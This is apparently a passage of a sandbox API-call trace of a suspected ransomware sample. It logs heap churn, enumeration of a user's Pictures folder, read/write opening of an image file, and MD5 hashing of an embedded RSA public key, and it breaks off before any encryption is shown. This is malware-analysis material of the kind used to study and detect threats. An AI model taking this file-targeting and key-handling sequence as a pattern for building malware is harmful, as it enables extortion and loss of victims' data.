hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.031] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.031] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.032] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.032] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.033] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.033] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.034] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.035] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.035] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.036] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.037] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.038] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.039] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.040] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.040] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.041] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.041] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.042] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.043] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.043] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.044] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.044] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.045] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.045] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.046] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0194.046] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.047] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.047] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.048] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0194.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.048] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0194.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0194.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.049] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.049] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.050] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.050] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0194.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.051] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.051] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.052] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0194.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0194.052] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.053] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\Ths6OlVH\\") returned="Ths6OlVH\\" [0194.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27ce8 [0194.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x50) returned 0x2c82a08 [0194.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.053] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\") returned="ymOmNEPhoB\\" [0194.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d422b0 [0194.053] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c82a08 | out: hHeap=0x6a0000) returned 1 [0194.053] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\") returned="Pictures\\" [0194.053] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d422b0 | out: hHeap=0x6a0000) returned 1 [0194.054] PathFindFileNameW (pszPath="C:\\Users\\kEecfMwgj\\") returned="kEecfMwgj\\" [0194.054] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x2d27b58 [0194.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.054] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0194.054] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d27b58 | out: hHeap=0x6a0000) returned 1 [0194.054] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0194.055] PathFindFileNameW (pszPath="") returned="" [0194.055] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.055] FindFirstFileW (in: lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\Ths6OlVH\\*" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\ths6olvh\\*"), lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd0d49010, ftCreationTime.dwHighDateTime=0x1d8a38c, ftLastAccessTime.dwLowDateTime=0xfec9f830, ftLastAccessTime.dwHighDateTime=0x1d8a660, ftLastWriteTime.dwLowDateTime=0xfec9f830, ftLastWriteTime.dwHighDateTime=0x1d8a660, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cbfa10 [0194.056] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.056] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd0d49010, ftCreationTime.dwHighDateTime=0x1d8a38c, ftLastAccessTime.dwLowDateTime=0xfec9f830, ftLastAccessTime.dwHighDateTime=0x1d8a660, ftLastWriteTime.dwLowDateTime=0xfec9f830, ftLastWriteTime.dwHighDateTime=0x1d8a660, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0194.056] FindNextFileW (in: hFindFile=0x2cbfa10, lpFindFileData=0x30ffba4 | out: lpFindFileData=0x30ffba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa2fea190, ftCreationTime.dwHighDateTime=0x1d8a0de, ftLastAccessTime.dwLowDateTime=0x8e947c60, ftLastAccessTime.dwHighDateTime=0x1d8a567, ftLastWriteTime.dwLowDateTime=0x8e947c60, ftLastWriteTime.dwHighDateTime=0x1d8a567, nFileSizeHigh=0x0, nFileSizeLow=0xb9ab, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AFh 4M.gif", cAlternateFileName="AFH4M~1.GIF")) returned 1 [0194.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x70) returned 0x2c3b640 [0194.057] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xa6) returned 0x2c2d920 [0194.057] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c3b640 | out: hHeap=0x6a0000) returned 1 [0194.057] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\Ths6OlVH\\AFh 4M.gif") returned=".gif" [0194.057] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Pictures\\ymOmNEPhoB\\Ths6OlVH\\AFh 4M.gif" (normalized: "c:\\users\\keecfmwgj\\pictures\\ymomnephob\\ths6olvh\\afh 4m.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x584 [0194.058] GetFileSizeEx (in: hFile=0x584, lpFileSize=0x30ffb40 | out: lpFileSize=0x30ffb40*=47531) returned 1 [0194.058] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2040000 [0194.061] SetFilePointerEx (in: hFile=0x584, liDistanceToMove=0xb985, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0194.061] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x30ffb78, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb78*=0x26, lpOverlapped=0x0) returned 1 [0194.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.063] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.063] SetFilePointer (in: hFile=0x584, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0194.064] ReadFile (in: hFile=0x584, lpBuffer=0x2040000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x30ffb70, lpOverlapped=0x0 | out: lpBuffer=0x2040000*, lpNumberOfBytesRead=0x30ffb70*=0xb9ab, lpOverlapped=0x0) returned 1 [0194.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.065] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f1) returned 0x2d32688 [0194.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.065] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0194.065] CryptAcquireContextW (in: phProv=0x30ffa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x30ffa50*=0x6eaa30) returned 1 [0194.066] CryptCreateHash (in: hProv=0x6eaa30, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x30ffa58 | out: phHash=0x30ffa58) returned 1 [0194.066] CryptHashData (hHash=0x2cbfa50, pbData=0x2d32688, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0194.066] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x0, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x30ffa54) returned 1 [0194.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x11) returned 0x2c44748 [0194.067] CryptGetHashParam (in: hHash=0x2cbfa50, dwParam=0x2, pbData=0x2c44748, pdwDataLen=0x30ffa54, dwFlags=0x0 | out: pbData=0x2c44748, pdwDataLen=0x30ffa54) returned 1 [0194.067] GetLastError () returned 0x0 [0194.067] CryptDestroyHash (hHash=0x2cbfa50) returned 1 [0194.067] CryptReleaseContext (hProv=0x6eaa30, dwFlags=0x0) returned 1 [0194.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d32688 | out: hHeap=0x6a0000) returned 1 [0194.067] UuidCreate (in: Uuid=0x30ffa48 | out: Uuid=0x30ffa48) returned 0x0 [0194.067] UuidToStringA (in: Uuid=0x30ffa48, StringUuid=0x30ffa40 | out: StringUuid=0x30ffa40) returned 0x0 [0194.067] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.067] RpcStringFreeA (in: String=0x30ffa40 | out: String=0x30ffa40) returned 0x0 [0194.067] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84c50 | out: hHeap=0x6a0000) returned 1 [0194.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84c50 [0194.068] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb9b0) returned 0x2d49778 [0194.068] SetFilePointer (in: hFile=0x584, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0194.068] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2c84b70 | out: hHeap=0x6a0000) returned 1 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3f920 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x30) returned 0x2c84b70 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1f0) returned 0x2d3fb18 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x58) returned 0x2bf9c38 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d422b0 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39f88 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x2d422f8 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fa0 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fd0 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d39fe8 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x2cc0bc0 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x158) returned 0x2c84da8 [0194.069] RtlReAllocateHeap (Heap=0x6a0000, Flags=0x0, Ptr=0x2c84da8, Size=0x218) returned 0x2d3b920 [0194.069] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x558) returned 0x2d42908 [0194.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fd0 | out: hHeap=0x6a0000) returned 1 [0194.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d39fe8 | out: hHeap=0x6a0000) returned 1 [0194.069] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a030 | out: hHeap=0x6a0000) returned 1 [0194.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2cc0bc0 | out: hHeap=0x6a0000) returned 1 [0194.070] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0194.070] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc) returned 0x2d3a030 [0194.070] RtlAllocateHeap 